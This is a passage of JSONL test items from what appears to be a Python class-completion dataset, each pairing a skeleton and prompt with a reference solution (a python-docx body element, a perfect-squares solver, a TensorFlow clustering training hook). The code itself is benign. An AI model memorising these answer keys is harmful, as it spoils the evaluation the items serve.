Leave the <w:sectPr> element if it is present.\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    sentinel_sectPr = self.get_or_add_sectPr()\n    cloned_sectPr = sentinel_sectPr.clone()\n    p = self.add_p()\n    p.set_sectPr(cloned_sectPr)\n    return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n    if self.sectPr is not None:\n        content_elms = self[:-1]\n    else:\n        content_elms = self[:]\n    for content_elm in content_elms:\n        self.remove(content_elm)\n<|end_body_1|>\n", "revision_id": "cabf6e4f1970dc14302f87414f170de19944bac2", "skeleton": "<|skeleton|>\nclass CT_Body:\n    \"\"\"``<w:body>``, the container element for the main document story in ``document.xml``.\"\"\"\n\n    def add_section_break(self):\n        \"\"\"Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n        <|body_0|>\n\n    def clear_content(self):\n        \"\"\"Remove all content child elements from this element. Leave the <w:sectPr> element if it is present.\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CT_Body:\n    \"\"\"``<w:body>``, the container element for the main document story in ``document.xml``.\"\"\"\n\n    def add_section_break(self):\n        \"\"\"Return the current ``<w:sectPr>`` element after adding a clone of it in a new ``<w:p>`` element appended to the block content elements. Note that the \"current\" ``<w:sectPr>`` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n        sentinel_sectPr = self.get_or_add_sectPr()\n        cloned_sectPr = sentinel_sectPr.clone()\n        p = self.add_p()\n        p.set_sectPr(cloned_sectPr)\n        return sentinel_sectPr\n\n    def clear_content(self):\n        \"\"\"Remove all content child elements from this element. 
Leave the <w:sectPr> element if it is present.\"\"\"\n        if self.sectPr is not None:\n            content_elms = self[:-1]\n        else:\n            content_elms = self[:]\n        for content_elm in content_elms:\n            self.remove(content_elm)\n", "source": "the_stack_v2_python_sparse", "source_path": "Pdf_docx_pptx_xlsx_epub_png/source/docx/oxml/document.py", "source_repo": "ryfeus/lambda-packs", "split": "test", "star_events_count": 1283} {"blob_id": "b0dfb261cd8e38c1bdaab216c55b49593deca1d5", "bodies": ["if n < 4:\n    return n\ncounts = list(range(n + 1))\nfor i in range(n):\n    j = 1\n    while True:\n        temp = i + j * j\n        if temp > n:\n            break\n        if counts[temp] > counts[i] + 1:\n            counts[temp] = counts[i] + 1\n        j += 1\nreturn counts[n]", "if n < 4:\n    return n\nsqrt_n = int(math.sqrt(n))\nif n == sqrt_n ** 2:\n    return 1\nwhile n % 4 == 0:\n    n //= 4\nif n % 8 == 7:\n    return 4\nsqrt_n = int(math.sqrt(n))\nfor i in range(1, sqrt_n + 1):\n    nii = n - i ** 2\n    sqrt_nii = int(math.sqrt(nii))\n    if nii == sqrt_nii ** 2:\n        return 2\nreturn 3"], "bodies_text": "<|body_start_0|>\n    if n < 4:\n        return n\n    counts = list(range(n + 1))\n    for i in range(n):\n        j = 1\n        while True:\n            temp = i + j * j\n            if temp > n:\n                break\n            if counts[temp] > counts[i] + 1:\n                counts[temp] = counts[i] + 1\n            j += 1\n    return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n    if n < 4:\n        return n\n    sqrt_n = int(math.sqrt(n))\n    if n == sqrt_n ** 2:\n        return 1\n    while n % 4 == 0:\n        n //= 4\n    if n % 8 == 7:\n        return 4\n    sqrt_n = int(math.sqrt(n))\n    for i in range(1, sqrt_n + 1):\n        nii = n - i ** 2\n        sqrt_nii = int(math.sqrt(nii))\n        if nii == sqrt_nii ** 2:\n            return 2\n    return 3\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def numSquares_DP(self, n):\n        \"\"\":type n: int :rtype: int\"\"\"\n        <|body_0|>\n\n    def numSquares_Math(self, n):\n        \"\"\":type n: int :rtype: int\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    if n < 4:\n        return n\n    counts = list(range(n + 1))\n    for i in range(n):\n        j = 1\n        while True:\n            temp = i + j * j\n            if temp > n:\n                break\n            if counts[temp] > counts[i] + 1:\n                counts[temp] = counts[i] + 1\n            j += 1\n    return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n    if n < 4:\n        return n\n    sqrt_n = int(math.sqrt(n))\n    if n == sqrt_n ** 2:\n        return 1\n    while n % 4 == 0:\n        n //= 4\n    if n % 8 == 7:\n        return 4\n    sqrt_n = int(math.sqrt(n))\n    for i in range(1, sqrt_n + 1):\n        nii = n - i ** 2\n        sqrt_nii = int(math.sqrt(nii))\n        if nii == sqrt_nii ** 2:\n            return 2\n    return 3\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000308", "length_bytes": 2068, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "numSquares_DP", "signature": "def numSquares_DP(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "numSquares_Math", "signature": "def numSquares_Math(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007361", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numSquares_DP(self, n): :type n: int :rtype: int\n- def numSquares_Math(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numSquares_DP(self, n): :type n: int :rtype: int\n- def numSquares_Math(self, n): :type n: 
int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n<|end_body_1|>\n", "revision_id": "e07b85a4121f2665393f1176befbdbe06f1e1ad0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n", "source": "the_stack_v2_python_sparse", "source_path": "Algorithms/perfect-squares.py", "source_repo": "feilniu/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "ce2d9685bfb3e088b13c668bd9dda946cd9539eb", "bodies": ["self.vae = vae\nself.vgmm = vgmm\nself.hps = hps\nself.utils = utils\nself.is_chief = is_chief\nself.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\nself.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\nself.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\nself.beta_steps = resolve_simple_number(hps, 'betaSteps')\nself.static_steps = resolve_simple_number(hps, 'staticSteps')\nself.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\nself.max_steps = resolve_simple_number(hps, 'maxSteps')\nself.mu = tf.placeholder(dtype=tf.float32)\nself.sigma = tf.placeholder(dtype=tf.float32)\nself.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\nself.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\nself.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\nself.gmm_data = None", "is_final = True if step == 0 else False\ngmm_input_slice = session.run(self.vae['z_mu'])\nif self.gmm_data is None:\n self.gmm_data = gmm_input_slice\nelse:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\ntfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\nif is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = 
cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\nsession.run(self.utils['incr_gs_step'])", "session = run_context.session\ngs = tf.train.global_step(session, self.utils['global_step'])\nif gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\nif gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\ngs_offset = gs - self.gamma_gmm_training_steps\nif gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\nelse:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])"], "bodies_text": "<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, 
feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "class_docstring": "S3VDC Training flow control", "class_name": "S3VDCHook", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. 
step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor 
{}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000309", "length_bytes": 26382, "license_type": "permissive", "methods": [{"docstring": "Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).", "name": "__init__", "signature": "def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None"}, {"docstring": "Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.", "name": "skl_init", "signature": "def skl_init(self, session: tf.Session, step: int) -> None"}, {"docstring": "The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.", "name": "before_run", "signature": "def before_run(self, run_context: tfe.SessionRunContext) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004469", "prompt": "Implement the Python class `S3VDCHook` described below.\n\nClass description:\nS3VDC Training flow control\n\nMethod signatures and docstrings:\n- def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None: Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\n- def skl_init(self, session: tf.Session, step: int) -> None: Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\n- def before_run(self, run_context: tfe.SessionRunContext) -> None: The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.", "prompted_full_text": "Implement the Python class `S3VDCHook` described below.\n\nClass description:\nS3VDC Training flow control\n\nMethod signatures and docstrings:\n- def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None: Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\n- def skl_init(self, session: tf.Session, step: int) -> None: Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. 
step {int} -- Current training step.\n- def before_run(self, run_context: tfe.SessionRunContext) -> None: The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\n\n<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n<|end_body_0|>\n\n<|body_start_1|>\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\n tfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\n if is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: skgmm.covariances_.T})\n self.gmm_data = None\n tfl.info('GMM init done at local step {} with momentum factor {}'.format(step, session.run(self.mtm)))\n session.run(self.utils['incr_gs_step'])\n<|end_body_1|>\n\n<|body_start_2|>\n session = run_context.session\n gs = tf.train.global_step(session, self.utils['global_step'])\n if gs == 0:\n tfl.info('S3VDC training begin at global step 1.')\n session.run(self.utils['incr_gs_step'])\n 
return\n if gs == self.max_steps - 1:\n tfl.info('S3VDC training end at global step {} with latent annealing factor {}.'.format(gs, session.run(self.vgmm['anneal_factor'])))\n gs_offset = gs - self.gamma_gmm_training_steps\n if gs_offset <= 0:\n if gs_offset <= -1.0 * self.gmm_steps:\n if gs_offset == 1 - self.gamma_gmm_training_steps:\n tfl.info('Gamma training begin at global step {}'.format(gs))\n session.run(self.vgmm['gamma_training_op'])\n else:\n self.skl_init(session, gs_offset)\n else:\n cyc_step = gs_offset % self.svdc_gmm_finetune_steps\n cyc_id = gs_offset // self.svdc_gmm_finetune_steps + 1\n if cyc_step > 0 and cyc_step <= self.beta_steps:\n if cyc_step == 1:\n tfl.info('PERIOD {}: Beta annealing begin at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n elif cyc_step == self.beta_steps:\n tfl.info('PERIOD {}: Beta annealing end at global step {} with latent annealing factor {}'.format(cyc_id, gs, session.run(self.vgmm['anneal_factor'])))\n session.run(self.vgmm['svdc_finetune_op'])\n else:\n session.run(self.vgmm['svdc_static_train_op'])\n<|end_body_2|>\n", "revision_id": "baa6689a6344f417758d4d8b4e6c6e966a510b32", "skeleton": "<|skeleton|>\nclass S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n <|body_0|>\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n <|body_1|>\n\n def before_run(self, run_context: tfe.SessionRunContext) -> None:\n \"\"\"The S3VDC flow control Arguments: run_context {tf.estimator.SessionRunContext} -- The run context.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class S3VDCHook:\n \"\"\"S3VDC Training flow control\"\"\"\n\n def __init__(self, vae: dict, vgmm: dict, hps: Union[tf.contrib.training.HParams, dict], utils: dict, is_chief: bool) -> None:\n \"\"\"Initialize the S3VDCHook. Arguments: vae {dict} -- The tuple return by calling function get_cvae(). vgmm {dict} -- The global GMM model weights/paramters. hps {Union[tf.contrib.training.HParams, dict]} -- Hyper parameters. utils {dict} -- The utility Tensors to be used by this class. 
is_chief {bool} -- Is chief node (only useful in distributed training).\"\"\"\n self.vae = vae\n self.vgmm = vgmm\n self.hps = hps\n self.utils = utils\n self.is_chief = is_chief\n self.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\n self.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\n self.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\n self.beta_steps = resolve_simple_number(hps, 'betaSteps')\n self.static_steps = resolve_simple_number(hps, 'staticSteps')\n self.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\n self.max_steps = resolve_simple_number(hps, 'maxSteps')\n self.mu = tf.placeholder(dtype=tf.float32)\n self.sigma = tf.placeholder(dtype=tf.float32)\n self.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\n self.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\n self.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\n self.gmm_data = None\n\n def skl_init(self, session: tf.Session, step: int) -> None:\n \"\"\"Perform initialization of global GMM model. Arguments: session {tf.Session} -- Session from the context. step {int} -- Current training step.\"\"\"\n is_final = True if step == 0 else False\n gmm_input_slice = session.run(self.vae['z_mu'])\n if self.gmm_data is None:\n self.gmm_data = gmm_input_slice\n else:\n self.gmm_data = np.concatenate([self.gmm_data, 